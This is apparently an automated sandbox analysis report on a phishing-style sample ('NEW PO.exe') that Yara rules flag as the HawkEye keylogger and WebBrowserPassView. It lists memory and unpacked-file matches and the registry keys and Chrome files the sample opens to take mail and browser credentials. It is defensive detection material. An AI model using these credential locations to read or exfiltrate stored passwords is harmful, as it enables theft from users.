Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.45.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.35.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.45fa72.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.45fa72.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.3aa9930.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.35.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.319742971.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.320558066.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.320160730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.404452957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.402038118.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.401599576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 3996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5076, type: MEMORYSTR

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.318319979.0000000002DF6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.392059792.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317941479.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313223758.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313404967.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400644306.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362383688.0000000002B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WerFault.exe PID: 6724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 3996, type: MEMORYSTR

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword	11_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword	11_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword	11_2_004033D7

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 22.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.3ac2370.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.33.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42f2370.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.42d9930.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE
